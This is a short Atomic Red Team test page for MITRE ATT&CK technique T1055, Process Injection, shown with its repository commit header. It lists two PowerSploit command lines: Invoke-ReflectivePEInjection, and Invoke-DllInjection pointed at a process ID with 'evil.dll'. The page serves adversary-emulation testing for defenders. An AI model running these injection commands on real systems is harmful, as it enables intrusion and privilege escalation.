Files
atomic-red-team/Windows/Privilege_Escalation/Process_Injection.md
T
Michael Haag b89a8ca7b7 Updated Map
Updated map
also fixed name
2018-04-24 10:31:26 -04:00

18 lines
551 B
Markdown

## Process Injection
MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055)
Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution)
### PowerShell Invoke-ReflectivePEInjection
Input:
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1
### Powershell Invoke-DllInjection
Input:
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll